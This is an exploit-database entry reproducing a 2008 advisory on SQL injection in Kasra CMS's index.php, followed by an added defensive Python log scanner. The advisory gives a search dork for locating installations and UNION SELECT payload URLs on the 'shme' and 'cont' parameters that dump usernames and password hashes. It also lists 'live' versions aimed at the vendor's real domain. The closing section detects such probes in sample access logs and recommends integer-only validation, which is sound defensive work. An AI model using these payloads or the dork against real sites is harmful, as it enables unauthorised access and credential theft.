Kasra CMS - 'index.php' Multiple SQL Injections

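Vulnerability ID 1056922 Vulnerability type
Published 2008-10-25 Updated 2008-10-25
CVE ID N/A CNNVD-ID N/A
Platform PHP CVSS score N/A
|Source
https://www.exploit-db.com/exploits/6837
|Vulnerability details
Vulnerability details have not yet been disclosed
|Exploit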
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
KasraCMS (index.php) Multiple Remote SQL Injection Vulnerabilities
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script: KasraCMS
[~] Language : PHP
[~] WebSite: http://kasracms.com
[~] affected File: index.php
[~] Type : Commercial
[~] Report-Date : 25/10/2008


--[ DoRK ]--
intext:"2007-2008 Kasra ICT"


--[ Founder ]--
G4N0K <mail.ganok[at]gmail.com>


--[ Exploit ]--
[~] http://localhost/[path]/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--
[~] http://localhost/[path]/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--


--[ L!ve ]--
http://kasracms.com/index.php?cont=-63 UNION ALL SELECT
0,0,0,concat(username,0x3a,password),0,0,0,0 FROM user--
http://kasracms.com/index.php?shme=-63 UNION ALL SELECT
0,0,concat(username,0x3a,password),0,0,0,0,0 FROM user--


--[ Greetz ]--
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//ALLAH, forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-10-25]
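
A defender-side check for the two parameters this advisory names, added here as an example that is not part of the original advisory or of Kasra CMS: it flags access-log requests to index.php whose shme or cont value is not a plain integer. The combined log format, the sample lines and the integer-ID assumption are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

WATCHED_PARAMS = ("shme", "cont")   # parameters named in the advisory
# Assumption: legitimate values are plain non-negative integer IDs.
VALID_ID = re.compile(r"\d{1,10}")
UNION_SELECT = re.compile(r"union\s+(?:all\s+)?select", re.IGNORECASE)
# Request target inside a combined-format access log line.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (not taken from any real server).
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Oct/2008:10:01:02 +0000] "GET /index.php?cont=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [25/Oct/2008:10:02:10 +0000] "GET /index.php?cont=-63%20UNION%20ALL%20SELECT%200,0%20FROM%20user-- HTTP/1.1" 200 7391',
    '203.0.113.9 - - [25/Oct/2008:10:02:15 +0000] "GET /cms/index.php?shme=-63+union+select+0,0 HTTP/1.1" 200 7402',
    '198.51.100.4 - - [25/Oct/2008:10:03:00 +0000] "GET /index.php?shme=7%27 HTTP/1.1" 500 312',
    '198.51.100.4 - - [25/Oct/2008:10:03:05 +0000] "GET /search.php?cont=abc HTTP/1.1" 200 901',
]

def suspicious_params(log_line):
    """Return [(param, decoded_value, reason)] for one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return []
    findings = []
    # parse_qs percent-decodes values and turns '+' into a space.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        if name not in WATCHED_PARAMS:
            continue
        for value in values:
            if VALID_ID.fullmatch(value):
                continue
            reason = "union-select" if UNION_SELECT.search(value) else "non-integer"
            findings.append((name, value, reason))
    return findings

def scan(lines):
    """Return [(line_number, param, reason)] for every flagged request."""
    return [(n, p, r) for n, line in enumerate(lines, 1)
            for p, _value, r in suspicious_params(line)]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The same integer-only rule, enforced in the application before the value reaches a query, is what closes this class of bug; the log check only shows where it was probed.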